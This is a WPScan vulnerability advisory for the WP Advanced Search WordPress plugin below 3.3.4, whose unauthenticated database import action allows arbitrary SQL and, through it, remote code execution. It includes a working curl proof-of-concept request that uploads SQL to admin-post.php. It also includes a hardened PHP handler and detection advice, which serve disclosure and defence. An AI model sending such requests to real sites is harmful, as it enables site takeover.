WPVDB-ID: F0573253-9DD4-4C73-AA2E-867C9CAAE0DC
Published: Mar 05, 2020 - 12:00 a.m.

WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)

Source: wpscan.com

Arbitrary database queries can be executed in an unauthenticated context through the "WP-Advanced-Search Plugin" database import action. For example, a new administrative account could be added to the WordPress instance and a malicious plugin deployed, so Remote Code Execution (RCE) would be possible in the end.

PoC

PoC: Update the admin's display name

```sh
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' \
    -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' \
    -H $'Accept-Encoding: gzip, deflate' \
    -H $'Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121' \
    -H $'Content-Length: 302' \
    -H $'Connection: close' \
    -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name="wp_advanced_search_file_import"; filename="test.sql"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name="Frycos" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121--\x0d\x0a' \
    $'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'
```
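As an added defensive illustration (not the plugin's own code, whose internals this entry does not show), the following is how a WordPress admin-post handler for the db_import action should be gated so that the request above is refused. The wpas_ function names, the nonce action string and the wpas_run_import() import routine are assumptions; the form field name comes from the PoC request.

```php
<?php
/*
 * Hardened handler for admin-post.php?action=db_import (illustrative, not the
 * plugin's code). Three gates that an unauthenticated import is missing:
 *   1. hook only admin_post_{action}, never admin_post_nopriv_{action}, so
 *      admin-post.php never dispatches this action for logged-out visitors;
 *   2. require a capability, so a low-privilege account cannot import;
 *   3. require a nonce, so an administrator cannot be tricked into importing.
 */

add_action( 'admin_post_db_import', 'wpas_hardened_db_import' );
// Deliberately NOT registered: add_action( 'admin_post_nopriv_db_import', ... );

function wpas_hardened_db_import() {
    // Gate 2: importing SQL into the site database is an admin-only operation.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 'Forbidden', array( 'response' => 403 ) );
    }

    // Gate 3: the submitting form must carry a nonce bound to this action
    // (assumed action string); check_admin_referer() dies on mismatch.
    check_admin_referer( 'wpas_db_import_nonce' );

    // Upload sanity: field name as used in the advisory's PoC request.
    $field = 'wp_advanced_search_file_import';
    if ( empty( $_FILES[ $field ]['tmp_name'] )
        || $_FILES[ $field ]['error'] !== UPLOAD_ERR_OK
        || ! is_uploaded_file( $_FILES[ $field ]['tmp_name'] ) ) {
        wp_die( 'No valid import file uploaded', 'Bad Request', array( 'response' => 400 ) );
    }

    // Bound the amount of SQL read (5 MiB, an assumed limit) before handing it
    // to the plugin's import routine; wpas_run_import() is hypothetical.
    $sql = file_get_contents( $_FILES[ $field ]['tmp_name'], false, null, 0, 5 * 1024 * 1024 );
    wpas_run_import( $sql );

    wp_safe_redirect( admin_url( 'admin.php?page=wp-advanced-search&imported=1' ) );
    exit;
}

/*
 * The admin page that submits to this action must embed the matching nonce,
 * e.g. inside the upload form (PHP tags omitted here):
 *   <input type="hidden" name="action" value="db_import">
 *   wp_nonce_field( 'wpas_db_import_nonce' );
 *   <input type="file" name="wp_advanced_search_file_import">
 */
```

With these gates in place, the PoC request receives a failure response from admin-post.php instead of reaching the import routine, and unauthenticated hits on action=db_import in the access log remain a useful detection signal for the unpatched versions.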